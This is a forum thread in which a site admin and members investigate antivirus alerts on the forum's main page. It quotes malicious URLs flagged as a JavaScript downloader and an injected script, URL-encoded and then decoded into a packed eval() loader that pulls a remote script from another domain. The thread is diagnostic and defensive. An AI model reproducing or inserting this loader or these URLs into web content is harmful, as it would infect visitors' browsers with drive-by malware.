Malware? Options

[BigMistake]

This is something I got a few hours ago while trying to get to the forums:



Scary stuff!

[Mata]

Thanks. I monitor all changes to pages on my domain, so if anything has got through that then it's at a low level that I don't have access to. I've asked my hosting company to run a full scan of my domains to see if they can spot where an exploit has been inserted.

[Hobbes]

I also just had an infection warning pop up from the Avast webshield as I visited the forums main page (.../forums).

Unfortunately, I missed the details, and for some reason the log is empty, so I can't be much more help than that :/

[Mata]

Thanks - I've bumped the host admins again.

[Hobbes]

Avast picked up this today upon opening the main forum page:

Object: http://wtgrvwohvgusoire.nl.ai/main.php?page=300c6519e5f2b0af
Infection: JS:Downloader-gen@bhv [Expl]
Process: C:\Program Files\Internet Explorer\iexplore.exe

[Mata]

Thanks... But I'm really not sure what to do. We've scanned the enitre site directory and the database, so there isn't anywhere else to look.

I do occasionally get people trying SQL injection hacks on my database - this generates an error log in which the SQL can remain and this can be used as an active script if the hacker knows where the error log will be stored. I've got file monitoring set up on my whole site that tells me when one of those logs is created and I go and delete them as soon as I can (less than 24 hours) and during that time no further alterations are made to my site (they would be picked up by the scanner). I don't think there is any way that these logs could be generating the problem you're seeing, but it's the only thing I can think of.

If you get another one, could you please open up the source code for the page you are viewing (this is right-click 'View page source' in Firefox, I don't remember it in IE) and do a search (Ctrl+F) to find where the code is being generated on the page - I'm wondering if perhaps someone has got a link to an avatar where the avatar page has been hacked, or something weird like that... Or perhaps someone has created a username that is read as code by the page and tries to execute a script... I'm really stumped for ideas and I'll need your help on this because I've never seen the error. If you can't find the problem, could you save the file and send it to my mata@ [this domain] address please and I'll see if there's anything in there that lets me work out what's going on.

Thanks!

[BigMistake]

Thanks... But I'm really not sure what to do. We've scanned the enitre site directory and the database, so there isn't anywhere else to look.

I do occasionally get people trying SQL injection hacks on my database - this generates an error log in which the SQL can remain and this can be used as an active script if the hacker knows where the error log will be stored. I've got file monitoring set up on my whole site that tells me when one of those logs is created and I go and delete them as soon as I can (less than 24 hours) and during that time no further alterations are made to my site (they would be picked up by the scanner). I don't think there is any way that these logs could be generating the problem you're seeing, but it's the only thing I can think of.

If you get another one, could you please open up the source code for the page you are viewing (this is right-click 'View page source' in Firefox, I don't remember it in IE) and do a search (Ctrl+F) to find where the code is being generated on the page - I'm wondering if perhaps someone has got a link to an avatar where the avatar page has been hacked, or something weird like that... Or perhaps someone has created a username that is read as code by the page and tries to execute a script... I'm really stumped for ideas and I'll need your help on this because I've never seen the error. If you can't find the problem, could you save the file and send it to my mata@ [this domain] address please and I'll see if there's anything in there that lets me work out what's going on.

Thanks!

It hasn't happened to me since then, maybe some temporary XSS?

[Hobbes]

This came up this morning on the main forum page:

URL: http://laykz.tetuku.com/images.php?t
Process: file://C:\Program Files (x86)\Internet E...
Infection: al

Unfortunately I clicked away before I viewed the source. I did go 'back' to the page, but I'm not sure whether it would show it up or not. I took a look through the source but didn't find anything unusual except a batch of URL code which, when decoded, is a javascript. It doesn't look malicious though, but does have a website reference which I don't see in any advertising or anything? It's probably entirely normal (as I don't really have any real experience with javascript beyond 'Hello World') but I'll post the info here anyway. I reloaded the page and the code is still there. I only really query it because it looks unusual as it's in URL encoded text. *shrugs*

It was at line 2024:

CODE

<script type="text/javascript">document.write(unescape('<script%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%20%63%2E%74%6F%53%74%72%69%6E%67%28%61%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%31%2E%32%28%5C%27%3C%30%20%33%3D%22%34%2F%35%22%20%36%3D%22%37%3A%2F%2F%38%2E%39%2E%61%2F%62%2F%63%2F%64%2E%65%22%3E%3C%2F%30%3E%5C%27%29%27%2C%31%35%2C%31%35%2C%27%73%63%72%69%70%74%7C%64%6F%63%75%6D%65%6E%74%7C%77%72%69%74%65%7C%74%79%70%65%7C%74%65%78%74%7C%6A%61%76%61%73%63%72%69%70%74%7C%73%72%63%7C%68%74%74%70%7C%67%6F%62%75%79%6C%6F%63%61%6C%7C%63%6F%6D%7C%61%75%7C%63%6F%6D%70%6F%6E%65%6E%74%73%7C%63%6F%6D%5F%63%6E%74%7C%63%6E%74%7C%6A%73%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3C%2F%73%63%72%69%70%74%3E'))</script>

Decoded it reads:

CODE

<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',15,15,'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'),0,{}))</script>')

I don't really know what gobuylocal stuff is? Again, it doesn't look overly malicious, but I just don't get why it is there?

[CrazyFooIAintGet...]

It's evaluating some obfuscated code.

Looks like it injects another script into the page.

CODE

<script type="text/javascript">
eval(
    function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(
                '1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',
        15,
        15,
        'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'), // this doesn't look good.
        0,
        {}
    )

)
</script>

[Mata]

Sorry, I didn't see this message when you first posted it.

I think what's happening is that someone is using an injection method through the error logging procedure of the forums. When the log is created, it records the dodgy code, then somehow that code can be run. Naturally, I delete the log as soon as I see it, but that's not instantly.

When I get back from holiday I think I'm going to have to stump up a couple of hundred euros to get someone to update the forum software and probably transfer all of the data onto a new open-source forum. It's a heck of a job, but the modern software will be more secure against this kind of thing as well as being easier to update... It's just going to cost a lot

[BigMistake]

Sorry, I didn't see this message when you first posted it.

I think what's happening is that someone is using an injection method through the error logging procedure of the forums. When the log is created, it records the dodgy code, then somehow that code can be run. Naturally, I delete the log as soon as I see it, but that's not instantly.

When I get back from holiday I think I'm going to have to stump up a couple of hundred euros to get someone to update the forum software and probably transfer all of the data onto a new open-source forum. It's a heck of a job, but the modern software will be more secure against this kind of thing as well as being easier to update... It's just going to cost a lot

Are you sure you need to dish out that kind of money? I'm not sure how the forum is set up but I'd imagine it involves a database. Couldn't you use the current database when trying out new forum software?

[CrazyFooIAintGet...]

You need to import everything into the new format though, which is going to be difficult if there isn't already a built in tool for that.

You could just archive the current forum and start over, but everyone would need to create new accounts.

[Mata]

Ouch. No, I'd rather not archive everything.

Yes, the problem comes in that there aren't automatic updaters or converters. If I get it all moved to modern software then I should be able to do that in the future, but this time I'll have to bite the bullet and get someone to do it the hard way.